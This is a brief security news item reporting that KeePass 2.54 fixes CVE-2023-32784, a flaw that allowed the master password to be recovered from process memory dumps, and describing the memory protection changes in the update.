Identity, Vulnerability Management

Master password-leaking bug addressed by KeePass

SecurityWeek reports that updates have been released by open source password manager KeePass to resolve the vulnerability, tracked as CVE-2023-32784, affecting KeePass 2.x versions, which could be exploited to facilitate cleartext master password retrievals from a memory dump. KeePass process dumps could have also been leveraged to fetch various typed-in passwords, although a security researcher who released a proof-of-concept tool noted the vulnerability's minimal risk due to its lack of remote exploitation capabilities. Included in the KeePass 2.54 update, which has been released weeks ahead of the expected stable version scheduled for a July launch, are process memory protection enhancements to circumvent managed string creation and password recovery, and the in-memory creation of dummy fragments that are then combined with the proper fragments. Additional features have also been included as part of the update, as well as bug fixes and improved user interface and integration.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.